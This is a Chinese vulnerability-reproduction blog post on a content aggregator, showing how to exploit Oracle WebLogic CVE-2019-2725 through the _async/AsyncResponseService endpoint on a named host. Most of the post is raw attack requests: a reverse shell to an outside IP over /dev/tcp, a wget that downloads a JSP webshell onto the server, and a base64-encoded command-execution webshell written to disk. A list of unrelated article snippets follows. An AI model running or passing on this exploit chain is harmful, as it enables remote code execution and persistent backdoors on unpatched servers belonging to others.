捡垃圾的小弟弟
捡垃圾的小弟弟

weblogic CNVD-C-2019-48814(CVE-2019-2725)

漏洞介绍

中国民生银行股份有限公司举办攻防演练发现攻击方采用48814 0day拿下服务器。

漏洞影响

Weblogic 10.3.6.0

Weblogic 12.1.3.0

Weblogic 12.2.1.2

Weblogic 12.2.1.3

复现过程

1.确认漏洞存在

http://www.bug1024.cn:17021/_async/AsyncResponseService

weblogic CNVD-C-2019-48814(CVE-2019-2725)_第1张图片

2.监听自己服务器的9999端口

weblogic CNVD-C-2019-48814(CVE-2019-2725)_第2张图片

3.反弹shell

POST /_async/AsyncResponseService HTTP/1.1
Host: www.bug1024.cn:17001
Content-Length: 794
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: think_var=zh-cn; PHPSESSID=40d1rb84g60dqi60nabgv05qn5
X-Forwarded-For: 192.168.111.135
Connection: keep-alive
Upgrade-Insecure-Requests: 1
content-type: text/xml



   
 
xx
xx




/bin/bash


-c


bash -i >& /dev/tcp/47.101.198.184/9999 0>&1
weblogic CNVD-C-2019-48814(CVE-2019-2725)_第3张图片

含义:把当前运行weblogic的bash反弹到47.101.198.184的9999端口上。



反弹成功


weblogic CNVD-C-2019-48814(CVE-2019-2725)_第4张图片

4.上传webshell

POST /_async/AsyncResponseService HTTP/1.1
Host: www.bug1024.cn:17001
Content-Length: 865
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: think_var=zh-cn; PHPSESSID=40d1rb84g60dqi60nabgv05qn5
X-Forwarded-For: 192.168.111.135
Connection: keep-alive
Upgrade-Insecure-Requests: 1
content-type: text/xml


   
 
xx
xx




/bin/bash


-c


wget http://47.101.198.184:80/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell3.jsp
weblogic CNVD-C-2019-48814(CVE-2019-2725)_第5张图片

5.访问webshell

http://www.bug1024.cn:17001/_async/webshell3.jsp

weblogic CNVD-C-2019-48814(CVE-2019-2725)_第6张图片

无网写shell

POST /_async/AsyncResponseService HTTP/1.1
Host: www.bug1024.cn:17001
Content-Length: 1388
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: think_var=zh-cn; PHPSESSID=qro0j9fr8vo4omtc06nvuuou65; JSESSIONID=r71RcyjP4TtTpnYNkhcpvZJNqLzWr82cpzDtTWDzljwnJJl9gm0p!-1900228417
Connection: close
Upgrade-Insecure-Requests: 1
content-type: text/xml



   
 
xx
xx




/bin/bash


-c


echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell1.jsp

访问 /_async/webshell.jsp?pwd=123&cmd=ifconfig

总结

1.反弹shell到自己服务器
2.burp构造payload,返回202状态如上图
3.反弹shell成功
4.把webshell.txt上传到自己服务器上
5.burp构造payload,返回202状态如上图
6.访问webshell.jsp

参考:https://www.jianshu.com/p/c4982a845f55?tdsourcetag=s_pctim_aiomsg

你可能感兴趣的:(weblogic CNVD-C-2019-48814(CVE-2019-2725))

  • Nginx 砌月东谷
    一、Nginx简介1.Nginx是什么??Nginx(enginex)是一个高性能的HTTP和反向代理服务器,也是一个IMAP/POP3/SMTP服务器?Nginx可以作为一个Web服务器进行网站的发布,也可以作为反向代理服务器进行负载均衡的实现?常见的Web服务器:Tomcat、Apache、Nginx、Weblogic等2.特点占用内存少、并发能力强二、搭建Nginx环境1.安装nginx?两
  • weblogic-SSRF漏洞复现(SSRF原理、利用与防御) 不想当脚本小子的脚本小子 中间件漏洞复现SSRF安全
    一、SSRF概念服务端请求伪造(Server-SideRequestForgery),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片、文档等等。首先,我们要对目标网站的架构了解
  • 网络安全售前入门08安全服务——Web漏洞扫描服务 努力工作的网安人 安全服务安全web安全前端网络安全经验分享
    目录1.服务概述2.服务内容2.1代码层安全2.2应用层安全3.服务工具4.服务输出1.服务概述Web漏洞扫描服务主要针对应用系统漏洞进行扫描,主要包括扫描WEB服务器(IIS、Websphere、Weblogic、Apache等)的漏洞;识别数据库类型;扫描第三方组件的漏洞;检测常见的WEB应用弱点,支持OWASPTOP10等主流安全漏洞。2.服务内容2.1代码层安全应用程序及代码在开发过程中,
  • Web容器、Servlet容器、Spring容器、SpringMVC容器之间的关系 weixin_30270889 javaweb.xml
    以下内容为个人理解,如有误还请留言指出,不胜感激!Web容器web容器(web服务器)主要有:Apache、IIS、Tomcat、Jetty、JBoss、webLogic等,而Tomcat、Jetty、JBoss、webLogic同时也是servlet容器,或者说他们还包含了servlet容器。没有servlet容器,你也可以用web容器直接访问静态页面,比如安装一个apache等,但是如果要显示
  • Weblogic下启用Gzip压缩
    在Weblogic服务器下启用Gzip压缩可以帮助减少网络传输的数据量,提升网站性能。以下是在Weblogic下启用Gzip压缩的步骤:打开Weblogic的管理控制台。在控制台中,定位到你想要启用Gzip压缩的服务器实例。点击你选择的服务器实例,进入其配置页面。在配置页面中,找到"Web服务器"或"HTTP"的设置部分。在此设置部分中,你应该能找到一个名为"Gzip压缩"的选项。点击此选项。在"
  • CVE-2017-12149漏洞复现 黑客大佬 漏洞复现web安全安全网络python
    服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish漏洞复现中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere,Jenkins,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery等1、中间件-Web
  • weblogic服务器设置编码 放开好人
    记一次系统应用迁移服务器,遇到的乱码问题。最近项目迁移到了新增加的服务器上,代码没有任何变化,只是服务器环境变了,所以问题来源可想而知,从服务器环境设置着手。首先,查看Linux服务器的编码,echo$LANG,发现旧服务器与新服务器编码一致,剩下的问题就是weblogic服务器了。网络上查了下,有些说法是,修改startWeblogic.sh文件,我实际操作并不是修改此文件。经过与旧服务器的对比
  • Weblogic系列漏洞复现——vulhub Never say die _ 中间件/框架漏洞复现合集java安全网络web安全xml
    #免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。WeblogicXMLDecoder反序列化漏洞(CVE-2017-10271)漏洞概述漏洞编号:CVE-2017-10271漏洞影响:wls-wsatXMLDecoder反序列化漏洞影响程度:重大影响版本:10.3.6.0.0、12.1.3.0.0、12.2.1.1.0、12.2.1.2.0漏洞url:/w
  • 内网渗透靶场02----Weblogic反序列化+域渗透 老男孩Nine 3.0红队特训营服务器运维
    网络拓扑:攻击机:Kali:192.168.111.129Win10:192.168.111.128靶场基本配置:web服务器双网卡机器:192.168.111.80(模拟外网)10.10.10.80(模拟内网)域成员机器WIN7PC192.168.111.20110.10.10.201域控DC:10.10.10.10利用kscan工具,针对192.168.111.0/24C段开展端口扫描,发现2
  • ORACLE的 软 软 软 解析! 客家族_Shark曾_小凡仙 Oracle管理oracle数据库
    在海鲨数据库架构师精英群里,有位朋友说ORACLE有软软软解析.就是把执行计划缓存在客户端里,从而避免去服务端找执行计划.他给了个设置方法,Weblogicconsole->datasource->connectionPoolStatementCacheType=>LRUStatementCacheSize=100CURSOR_NUMBER=100*20CONNECT=2000最后JAVA使用要启
  • Weblogic配置SSL全过程 西伯利亚疯狂的蚯蚓 文档SSLWeblogic
    1基本原理1.1SSL简介SSL代表安全套接字层,主要用于两个目的:验证网站的身份以及(可选)客户身份在程序之间建立安全的加密连接SSL协议为通过网络连接的应用程序提供安全性。具体来说,SSL协议提供以下内容:应用程序交换的数据的加密应用程序可以用来验证彼此身份的机制数据完整性,从而保护在客户端和服务器之间流动的数据免受第三方篡改当使用SSL协议时,目标总是向发起者验证自己。可选地,如果目标请求它
  • 使用 IntelliJ IDEA 配合 Docker 对 Weblogic 中间件进行远程调试 carrot11223 网络安全intellij-ideadocker中间件
    使用idea对jar包远程调试:打开一个springboot的项目进行远程调试设置:运行:其实我不太明白远程调试的意义,本地直接debug不好嘛。。。点击debug的按钮,打断点测试:跑到断点处:远程debug即对远程部署的内容进行debug,例如我们部署的项目在线上出现问题了,而我们又不知道具体是哪里出现问题,我们就可以使用远程debug进行排查问题。这里在idea中使用的是localhost,
  • 第六十一天 服务攻防-中间件安全&CVE复现&K8S&Docker&Jetty&Websphere 清歌secure 网络安全全栈学习笔记中间件安全kubernetesweb安全网络安全
    第61天服务攻防-中间件安全&CVE复现&K8S&Docker&Jetty&Websphere知识点:中间件及框架列表:lIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere,Jenkins,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Sprng,Flask,jQuery0、中间件-K
  • nginx反向代理 cookie失效问题 lyl117363 cookie失效
    有一次生产环境修复漏洞将中间件从weblogic更换为tomcat,启动后所有前端请求均未携带cookie.导致应用不能正常运行.1.war包在tomcat启动后会自动解压生成war包名称的文件夹.2.nginx反向代理配置proxy_pass将请求地址重写.如前端请求localhost/public/getimenginx反代为localhost/abc/public/gettime这时tomc
  • 关于weblogic的后台运行 可爱傻妞是我的爱
    在linux下布置安装weblogic完成,运行./startWeblogic运行成功。控制台也可以正确打开,但是发现一旦按下ctrl+c退出,或者ctrl+z都会导致weblogic的关闭。所以我们需要让weblogic在linux的后台运行。方法:利用nohup指令;操作:输入nohup./startWeblogic&启动weblogic,然后启动的日志会被输入nohup.out下,这个时候按
  • Weblogic反序列化漏洞分析之CVE-2021-2394 昵称还在想呢 java代码审计开发语言java安全web安全
    目录简介前置知识Serializable示例Externalizable示例联系weblogicExternalizableLite接口ExternalizableHelperl类JdbcRowSetImpl类MethodAttributeAccessor类AbstractExtractor类FilterExtractor类TopNAggregator$PartialResult类SortedBa
  • 网络安全全栈培训笔记(60-服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish) 清歌secure 网络安全全栈学习笔记安全web安全笔记网络安全jenkins中间件
    第60天服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish知识点:中间件及框架列表:lIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere,Jenkins,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Sprng,Flask,jQuery1、中间件-W
  • TOMCAT介绍--自定义配置Host java落花雨 tomcatservletjava
    TOMCAT介绍1、服务器概述1.1、基本概念1.1.1、servle容器1.1.2、web容器1.1.3、web服务器2.1、常见的服务器2.1.1、webLogic2.1.2、WebSphere2.1.3、Tomcat2、Tomcat基本概念2.1概述2.2、虚拟主机2.3、web应用2.4、DNS服务器2.5、Hosts文件3、tomcat核心配置3.1、配置虚拟主机3.2、web应用目录结
  • classloader实战:如何不重启校验数据库驱动链接 xpbob
    场景介绍使用过was的时候,我们常见的建立数据源时有一个验证数据库信息的正确性的按钮。但是如果没有相应的驱动包的时候,校验是失败的,如果想校验成功,那就加入对应的数据库驱动包即可,但是was本身并不是热部署的,要想验证那就必须重启was。这个在服务器还是可以接受的,因为你建立数据源肯定是是先有规划的,驱动包都是放入指定地点的,weblogic11gwas本身还提供了很多数据库的Jar包以备使用。但
  • Redhat6.10下静默安装WebLogic 小六的昵称已被使用
    title:Redhat6.10下静默安装WebLogiccategories:Linuxtags:-WebLogictimezone:Asia/Shanghaidate:2019-01-06环境[root@redhat610-ch-guihome]#cat/etc/redhat-releaseRedHatEnterpriseLinuxServerrelease6.10(Santiago[root
  • 网络安全全栈培训笔记(59-服务攻防-中间件安全&CVE复现&lS&Apache&Tomcata&Nginx) 清歌secure 网络安全全栈学习笔记安全web安全笔记
    第59天服务攻防-中间件安全&CVE复现&lS&Apache&Tomcata&Nginx知识点:中间件及框架列表:lIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere,Jenkins,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Sprng,Flask,jQuery1、中间件-IIS短
  • 本地启动没问题 发到服务器上报错at weblogic.application.utils.ClassFinderMetaDataEnumaration.hasMoreElements(Clas... 郑勇锋
    weblogic.application.ModuleException:Failedtoloadwebapp:bdc-dj-server-1.0.0becauseofDeploymentException:java.lang.NullPointerExceptionatweblogic.servlet.internal.WebAppModule.prepare(WebAppModule.java
  • 国外技术网站推荐 zcwfeng
    http://blog.adam-bien.com/AdamBien的个人博客,主要是Java&JavaEE相关。http://techblog.bozho.net/Java,Android,WEB相关http://www.captaindebug.com/Java,Spring,Weblogic,Oracle,MySQL等。http://www.devx.com/综合类的技术门户网站http:/
  • Could not initialize class sun.awt.X11.XToolkit Error Pierre_ Linuxjavaweblogiclinux
    问题描述Weblogic应用中,有个上传图片功能,总是在上传时终止执行,无法上传成功。服务器的Weblogic环境配置:*jdk1.6.0_18+linux-64*OracleWeblogicServer10.3.3.0后台报错信息:从报错信息分析,是找不到类,无法初始化sun.awt.X11.XToolkit。解决方案在Weblogic的启动脚本中,修改Java命令启动选项,增加“-Djava.
  • 【Java基础】JPA详解(part1) sylar哇咔咔 数据库JavaHibernatejavajpa数据库
    1.JPA简介:Java持久化规范,是从EJB2.x以前的实体Bean(Entitybean)分离出来的,EJB3以后不再有实体bean,而是将实体bean放到JPA中实现。JPA是sun提出的一个对象持久化规范,各JavaEE应用服务器自主选择具体实现,JPA的设计者是Hibernate框架的作者,因此Hibernate作为Jboss服务器中JPA的默认实现,Oracle的Weblogic使用E
  • 中间件 .:::. 中间件
    在Java开发中,中间件是指位于应用程序和操作系统之间的软件层,它提供了一些通用的功能和服务,帮助简化开发和部署过程,提高系统的可靠性、性能和可扩展性。常见的Java中间件包括:1.应用服务器(ApplicationServer):如Tomcat、Jetty、WebSphere、WebLogic等。应用服务器提供了对JavaServlet、JavaServerPages(JSP)、Enterpri
  • 服务攻防-中间件安全&HW2023-WPS分析&Weblogic&Jetty&Jenkins&CVE SuperherRo #服务安全篇中间件wpsJettyJenkinsweblogic
    知识点:1、中间件-Jetty-CVE&信息泄漏2、中间件-Jenkins-CVE&RCE执行3、中间件-Weblogic-CVE&反序列化&RCE4、应用WPS-HW2023-RCE&复现&上线CS章节点:1、目标判断-端口扫描&组合判断&信息来源2、安全问题-配置不当&CVE漏洞&弱口令爆破3、复现对象-数据库&中间件&开发框架&应用协议一、演示案例-中间件-Jetty-CVE&信息泄漏Jet
  • java代码审计入门--01 划水的小白白 基础闲聊篇java代码审计
    入门知识总体目标方向先熟悉一些基本的流程安装配置对应环境与分析工具常规漏洞代码审计分析一些框架漏洞代码审计分析学习方向个人认为主要的方向如下:学习了解java的基本使用学习掌握常见Web漏洞的原理(注入、XSS、SSRF等)学习审计常见漏洞学习审计中间件框架的知识(weblogic、fastjson等)代码审计流程配置分析环境没什么说的,没环境还分析个锤子熟悉业务流程功能总体分为多少块,每一块的功
  • Nginx反向代理的主被动健康检查 XL's妃妃 nginxnginx
    一、环境介绍:1、系统:centos72、应用部署:weblogic12c2、nginx版本:nginx-1.7.23、应用1(weblogic1):192.168.29.149:7018/realware4、应用2(weblogic2):192.168.29.150:7012/realware5、nginx服务器:192.168.29.152:8080二、下载nginx-1.7.2mkdir-p
  • vulhub之weblogic篇 咩了个咩咩 安全
    SSRF环境启动1.访问http://192.168.245.131:7001/uddiexplorer/,即可查看uddiexplorer应用SSRF漏洞存在于/uddiexplorer/SearchPublicRegistries.jsp,提交参数值为url:port,根据返回错误不同,可对内网状态进行探测如端口开放状态等随便输入内容,抓包发现如下图operator参数,参数的值是url,怀疑
  • Spring中@Value注解,需要注意的地方 无量 springbean@Valuexml
    Spring 3以后,支持@Value注解的方式获取properties文件中的配置值,简化了读取配置文件的复杂操作 1、在applicationContext.xml文件(或引用文件中)中配置properties文件 <bean id="appProperty" class="org.springframework.beans.fac
  • mongoDB 分片 开窍的石头 mongodb
        mongoDB的分片。要mongos查询数据时候 先查询configsvr看数据在那台shard上,configsvr上边放的是metar信息,指的是那条数据在那个片上。由此可以看出mongo在做分片的时候咱们至少要有一个configsvr,和两个以上的shard(片)信息。     第一步启动两台以上的mongo服务 &nb
  • OVER(PARTITION BY)函数用法 0624chenhong oracle
    这篇写得很好,引自 http://www.cnblogs.com/lanzi/archive/2010/10/26/1861338.html OVER(PARTITION BY)函数用法 2010年10月26日 OVER(PARTITION BY)函数介绍 开窗函数        &nb
  • Android开发中,ADB server didn't ACK 解决方法 一炮送你回车库 Android开发
    首先通知:凡是安装360、豌豆荚、腾讯管家的全部卸载,然后再尝试。   一直没搞明白这个问题咋出现的,但今天看到一个方法,搞定了!原来是豌豆荚占用了 5037 端口导致。 参见原文章:一个豌豆荚引发的血案——关于ADB server didn't ACK的问题 简单来讲,首先将Windows任务进程中的豌豆荚干掉,如果还是不行,再继续按下列步骤排查。 &nb
  • canvas中的像素绘制问题 换个号韩国红果果 JavaScriptcanvas
    pixl的绘制,1.如果绘制点正处于相邻像素交叉线,绘制x像素的线宽,则从交叉线分别向前向后绘制x/2个像素,如果x/2是整数,则刚好填满x个像素,如果是小数,则先把整数格填满,再去绘制剩下的小数部分,绘制时,是将小数部分的颜色用来除以一个像素的宽度,颜色会变淡。所以要用整数坐标来画的话(即绘制点正处于相邻像素交叉线时),线宽必须是2的整数倍。否则会出现不饱满的像素。 2.如果绘制点为一个像素的
  • 编码乱码问题 灵静志远 javajvmjsp编码
    1、JVM中单个字符占用的字节长度跟编码方式有关,而默认编码方式又跟平台是一一对应的或说平台决定了默认字符编码方式;2、对于单个字符:ISO-8859-1单字节编码,GBK双字节编码,UTF-8三字节编码;因此中文平台(中文平台默认字符集编码GBK)下一个中文字符占2个字节,而英文平台(英文平台默认字符集编码Cp1252(类似于ISO-8859-1))。 3、getBytes()、getByte
  • java 求几个月后的日期 darkranger calendargetinstance
    Date plandate = planDate.toDate(); SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd"); Calendar cal = Calendar.getInstance(); cal.setTime(plandate); // 取得三个月后时间 cal.add(Calendar.M
  • 数据库设计的三大范式(通俗易懂) aijuans 数据库复习
    关系数据库中的关系必须满足一定的要求。满足不同程度要求的为不同范式。数据库的设计范式是数据库设计所需要满足的规范。只有理解数据库的设计范式,才能设计出高效率、优雅的数据库,否则可能会设计出错误的数据库. 目前,主要有六种范式:第一范式、第二范式、第三范式、BC范式、第四范式和第五范式。满足最低要求的叫第一范式,简称1NF。在第一范式基础上进一步满足一些要求的为第二范式,简称2NF。其余依此类推。
  • 想学工作流怎么入手 atongyeye jbpm
    工作流在工作中变得越来越重要,很多朋友想学工作流却不知如何入手。 很多朋友习惯性的这看一点,那了解一点,既不系统,也容易半途而废。好比学武功,最好的办法是有一本武功秘籍。研究明白,则犹如打通任督二脉。 系统学习工作流,很重要的一本书《JBPM工作流开发指南》。 本人苦苦学习两个月,基本上可以解决大部分流程问题。整理一下学习思路,有兴趣的朋友可以参考下。 1  首先要
  • Context和SQLiteOpenHelper创建数据库 百合不是茶 androidContext创建数据库
           一直以为安卓数据库的创建就是使用SQLiteOpenHelper创建,但是最近在android的一本书上看到了Context也可以创建数据库,下面我们一起分析这两种方式创建数据库的方式和区别,重点在SQLiteOpenHelper     一:SQLiteOpenHelper创建数据库:   1,SQLi
  • 浅谈group by和distinct bijian1013 oracle数据库group bydistinct
            group by和distinct只了去重意义一样,但是group by应用范围更广泛些,如分组汇总或者从聚合函数里筛选数据等。         譬如:统计每id数并且只显示数大于3 select id ,count(id) from ta
  • vi opertion 征客丶 macoprationvi
    进入 command mode (命令行模式) 按 esc 键 再按 shift + 冒号 注:以下命令中 带 $ 【在命令行模式下进行】,不带 $ 【在非命令行模式下进行】 一、文件操作 1.1、强制退出不保存 $ q! 1.2、保存 $ w 1.3、保存并退出 $ wq 1.4、刷新或重新加载已打开的文件 $ e 二、光标移动 2.1、跳到指定行 数字
  • 【Spark十四】深入Spark RDD第三部分RDD基本API bit1129 spark
      对于K/V类型的RDD,如下操作是什么含义?   val rdd = sc.parallelize(List(("A",3),("C",6),("A",1),("B",5)) rdd.reduceByKey(_+_).collect  reduceByKey在这里的操作,是把
  • java类加载机制 BlueSkator java虚拟机
    java类加载机制 1.java类加载器的树状结构 引导类加载器 ^ | 扩展类加载器 ^ | 系统类加载器 java使用代理模式来完成类加载,java的类加载器也有类似于继承的关系,引导类是最顶层的加载器,它是所有类的根加载器,它负责加载java核心库。当一个类加载器接到装载类到虚拟机的请求时,通常会代理给父类加载器,若已经是根加载器了,就自己完成加载。 虚拟机区分一个Cla
  • 动态添加文本框 BreakingBad 文本框
      <script>     var num=1; function AddInput() {      var str="";     str+="<input 
  • 读《研磨设计模式》-代码笔记-单例模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ public class Singleton { } /* * 懒汉模式。注意,getInstance如果在多线程环境中调用,需要加上synchronized,否则存在线程不安全问题 */ class LazySingleton
  • iOS应用打包发布常见问题 chenhbc iosiOS发布iOS上传iOS打包
    这个月公司安排我一个人做iOS客户端开发,由于急着用,我先发布一个版本,由于第一次发布iOS应用,期间出了不少问题,记录于此。   1、使用Application Loader 发布时报错:Communication error.please use diagnostic mode to check connectivity.you need to have outbound acc
  • 工作流复杂拓扑结构处理新思路 comsci 设计模式工作算法企业应用OO
    我们走的设计路线和国外的产品不太一样,不一样在哪里呢?  国外的流程的设计思路是通过事先定义一整套规则(类似XPDL)来约束和控制流程图的复杂度(我对国外的产品了解不够多,仅仅是在有限的了解程度上面提出这样的看法),从而避免在流程引擎中处理这些复杂的图的问题,而我们却没有通过事先定义这样的复杂的规则来约束和降低用户自定义流程图的灵活性,这样一来,在引擎和流程流转控制这一个层面就会遇到很
  • oracle 11g新特性Flashback data archive daizj oracle
    1. 什么是flashback data archive Flashback data archive是oracle 11g中引入的一个新特性。Flashback archive是一个新的数据库对象,用于存储一个或多表的历史数据。Flashback archive是一个逻辑对象,概念上类似于表空间。实际上flashback archive可以看作是存储一个或多个表的所有事务变化的逻辑空间。
  • 多叉树:2-3-4树 dieslrae
        平衡树多叉树,每个节点最多有4个子节点和3个数据项,2,3,4的含义是指一个节点可能含有的子节点的个数,效率比红黑树稍差.一般不允许出现重复关键字值.2-3-4树有以下特征:     1、有一个数据项的节点总是有2个子节点(称为2-节点)     2、有两个数据项的节点总是有3个子节点(称为3-节
  • C语言学习七动态分配 malloc的使用 dcj3sjt126com clanguagemalloc
    /* 2013年3月15日15:16:24 malloc 就memory(内存) allocate(分配)的缩写 本程序没有实际含义,只是理解使用 */ # include <stdio.h> # include <malloc.h> int main(void) { int i = 5; //分配了4个字节 静态分配 int * p
  • Objective-C编码规范[译] dcj3sjt126com 代码规范
      原文链接 : The official raywenderlich.com Objective-C style guide 原文作者 : raywenderlich.com Team 译文出自 : raywenderlich.com Objective-C编码规范 译者 : Sam Lau
  • 0.性能优化-目录 frank1234 性能优化
    从今天开始笔者陆续发表一些性能测试相关的文章,主要是对自己前段时间学习的总结,由于水平有限,性能测试领域很深,本人理解的也比较浅,欢迎各位大咖批评指正。 主要内容包括: 一、性能测试指标 吞吐量、TPS、响应时间、负载、可扩展性、PV、思考时间 http://frank1234.iteye.com/blog/2180305 二、性能测试策略 生产环境相同 基准测试 预热等 htt
  • Java父类取得子类传递的泛型参数Class类型 happyqing java泛型父类子类Class
      import java.lang.reflect.ParameterizedType; import java.lang.reflect.Type; import org.junit.Test; abstract class BaseDao<T> { public void getType() { //Class<E> clazz =
  • 跟我学SpringMVC目录汇总贴、PDF下载、源码下载 jinnianshilongnian springMVC
      ----广告-------------------------------------------------------------- 网站核心商详页开发 掌握Java技术,掌握并发/异步工具使用,熟悉spring、ibatis框架; 掌握数据库技术,表设计和索引优化,分库分表/读写分离; 了解缓存技术,熟练使用如Redis/Memcached等主流技术; 了解Ngin
  • the HTTP rewrite module requires the PCRE library 流浪鱼 rewrite
    ./configure: error: the HTTP rewrite module requires the PCRE library. 模块依赖性Nginx需要依赖下面3个包 1. gzip 模块需要 zlib 库 ( 下载: http://www.zlib.net/ ) 2. rewrite 模块需要 pcre 库 ( 下载: http://www.pcre.org/ ) 3. s
  • 第12章 Ajax(中) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Optimize query with Query Stripping in Web Intelligence blueoxygen BO
    http://wiki.sdn.sap.com/wiki/display/BOBJ/Optimize+query+with+Query+Stripping+in+Web+Intelligence and a very straightfoward video http://www.sdn.sap.com/irj/scn/events?rid=/library/uuid/40ec3a0c-936
  • Java开发者写SQL时常犯的10个错误 tomcat_oracle javasql
    1、不用PreparedStatements   有意思的是,在JDBC出现了许多年后的今天,这个错误依然出现在博客、论坛和邮件列表中,即便要记住和理解它是一件很简单的事。开发者不使用PreparedStatements的原因可能有如下几个:   他们对PreparedStatements不了解   他们认为使用PreparedStatements太慢了   他们认为写Prepar
  • 世纪互联与结盟有感 阿尔萨斯
    10月10日,世纪互联与(Foxcon)签约成立合资公司,有感。 全球电子制造业巨头(全球500强企业)与世纪互联共同看好IDC、云计算等业务在中国的增长空间,双方迅速果断出手,在资本层面上达成合作,此举体现了全球电子制造业巨头对世纪互联IDC业务的欣赏与信任,另一方面反映出世纪互联目前良好的运营状况与广阔的发展前景。 众所周知,精于电子产品制造(世界第一),对于世纪互联而言,能够与结盟
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他